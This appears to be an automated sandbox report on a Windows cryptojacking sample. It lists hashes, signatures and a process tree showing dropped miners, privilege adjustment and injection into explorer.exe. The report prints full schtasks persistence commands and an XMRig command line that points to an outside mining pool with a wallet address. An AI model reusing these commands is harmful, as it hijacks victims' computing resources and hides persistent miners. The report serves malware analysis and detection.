Overview
Analysis
- max time kernel: 599s
- max time network: 590s
- platform: windows11-21h2_x64
- resource: win11-20231215-en
- resource tags: arch:x64, arch:x86, image:win11-20231215-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 20-12-2023 01:43
Behavioral tasks (all run on resource win11-20231215-en)
- behavioral1: 076be2c09b944ec56381f42405728f7f657d2597b6e27191354568fb70170b29.exe
- behavioral2: 0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
- behavioral3: 131d6fb9204ceda508075afce9b9b65e429952674e914d224268deb319a0aab1.exe
- behavioral4: 1c133b9bb476879df8145370ce1069ec92f28cade85a839e0159158a3e1b1afd.exe
- behavioral5: 30af8d3ec685a4a5669f1377bb74589772a0428d9daa214c179a795dcf4b9030.exe
- behavioral6: 41c9d28653704e628d8dd20e5f65a298242072156a31bc5fe0e24a1f4c640af5.exe
- behavioral7: 5a0daa24b5748d81ba0bb78d7f2b50eb4c387ffe679c92c1462f7dec586adb1f.exe
- behavioral8: 630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad.exe
- behavioral9: 651bc82076659431e06327aeb3aacef2c30bf3cfd43ae4f9bc6b4222f15bb673.exe
- behavioral10: 677bea9e71aa3a56fe62a20580eb0786431a4789cb340a7294eb243054191c58.exe
- behavioral11: 7afefba65e72f42925ba76fae9ea98286eff7d0d01dcccd07c6117384858b6bb.exe
- behavioral12: 817c226e42f5c503325288fd8273bc03b326590f457e7a589eb34c2792d0a5db.dll
- behavioral13: a925fc1289573f01bb86482e38340f0fe431269aa7500d776713c71091c49142.exe
- behavioral14: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
- behavioral15: f2923f695dc02132cea5c0241060dba9a35d317342675118f7b22288e78cee7d.msi
- behavioral16: f58d2071a2fdaea27d814e788e002fe5da63843546f22c255eceade162323ce1.exe
General
- Target: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
- Size: 256KB
- MD5: 18d05e20731583a22b495d0d1f107c5b
- SHA1: 2ced0e3577063ca3613b43661e7df5bc1411ab09
- SHA256: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
- SHA512: 36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
- SSDEEP: 3072:Cf1BDZ0kVB67Duw9AMcb6FKglbz5107+i9CUVx/kvBFi4lBV5AfeNNu0NiF:C9X0GT6FKgpF107+iNDG5l5AfeNpNs
Signatures
- XMRig Miner payload (16 IoCs)
  resource / yara_rule:
  behavioral14/memory/2040-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-88-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-94-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-95-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-96-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-97-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-98-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-99-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-100-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-101-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-104-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-105-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-109-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
  behavioral14/memory/2040-111-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
- Executes dropped EXE (6 IoCs)
  pid / Process:
  4596 xmrmine.exe
  2880 etcmin.exe
  4672 serverpatch.exe
  3420 rtksmbs.exe
  2980 sihost64.exe
  3004 sihost32.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Suspicious use of SetThreadContext (1 IoCs)
  description / pid / Process / procid_target:
  PID 4672 set thread context of 2040 | 4672 serverpatch.exe | 105
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTPs, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process:
  1520 schtasks.exe
  3960 schtasks.exe
  1612 schtasks.exe
  5104 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / Process:
  4596 xmrmine.exe
  2880 etcmin.exe
  4672 serverpatch.exe
  3420 rtksmbs.exe
  2040 explorer.exe (60 identical entries)
- Suspicious behavior: LoadsDriver (1 IoCs)
  pid / Process:
  684 Process not Found
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description / pid / Process:
  Token: SeDebugPrivilege | 4596 xmrmine.exe
  Token: SeDebugPrivilege | 2880 etcmin.exe
  Token: SeDebugPrivilege | 4672 serverpatch.exe
  Token: SeDebugPrivilege | 3420 rtksmbs.exe
  Token: SeLockMemoryPrivilege | 2040 explorer.exe (2 identical entries)
- Suspicious use of WriteProcessMemory (43 IoCs)
  description / pid / Process / procid_target (each entry is recorded twice unless noted):
  PID 2272 wrote to memory of 4596 | 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe | 79
  PID 2272 wrote to memory of 2880 | 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe | 80
  PID 4596 wrote to memory of 5052 | 4596 xmrmine.exe | 87
  PID 2880 wrote to memory of 4760 | 2880 etcmin.exe | 89
  PID 5052 wrote to memory of 1520 | 5052 cmd.exe | 91
  PID 4760 wrote to memory of 3960 | 4760 cmd.exe | 92
  PID 4596 wrote to memory of 4672 | 4596 xmrmine.exe | 93
  PID 2880 wrote to memory of 3420 | 2880 etcmin.exe | 94
  PID 4672 wrote to memory of 3028 | 4672 serverpatch.exe | 96
  PID 3028 wrote to memory of 1612 | 3028 cmd.exe | 98
  PID 4672 wrote to memory of 2980 | 4672 serverpatch.exe | 99
  PID 3420 wrote to memory of 4244 | 3420 rtksmbs.exe | 100
  PID 3420 wrote to memory of 3004 | 3420 rtksmbs.exe | 102
  PID 4244 wrote to memory of 5104 | 4244 cmd.exe | 104
  PID 4672 wrote to memory of 2040 | 4672 serverpatch.exe | 105 (15 identical entries)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (nesting shows the parent/child tree)
- C:\Users\Admin\AppData\Local\Temp\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
  PID: 2272
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\xmrmine.exe
    Command line: C:\Users\Admin\AppData\Roaming\xmrmine.exe
    PID: 4596
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
      PID: 5052
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
        PID: 1520
        Signatures: Creates scheduled task(s)
    - C:\Users\Admin\appdata\roaming\serverpatch.exe
      Command line: "C:\Users\Admin\appdata\roaming\serverpatch.exe"
      PID: 4672
      Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
        PID: 3028
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
          PID: 1612
          Signatures: Creates scheduled task(s)
      - C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
        Command line: "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
        PID: 2980
        Signatures: Executes dropped EXE
      - C:\Windows\explorer.exe
        Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
        PID: 2040
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\etcmin.exe
    Command line: C:\Users\Admin\AppData\Roaming\etcmin.exe
    PID: 2880
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
      PID: 4760
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
        PID: 3960
        Signatures: Creates scheduled task(s)
    - C:\Users\Admin\appdata\roaming\rtksmbs.exe
      Command line: "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
      PID: 3420
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
        PID: 4244
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
          PID: 5104
          Signatures: Creates scheduled task(s)
      - C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
        Command line: "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
        PID: 3004
        Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 7KB
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
- Filesize: 8KB
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
- Filesize: 147KB
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
- Filesize: 155KB
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32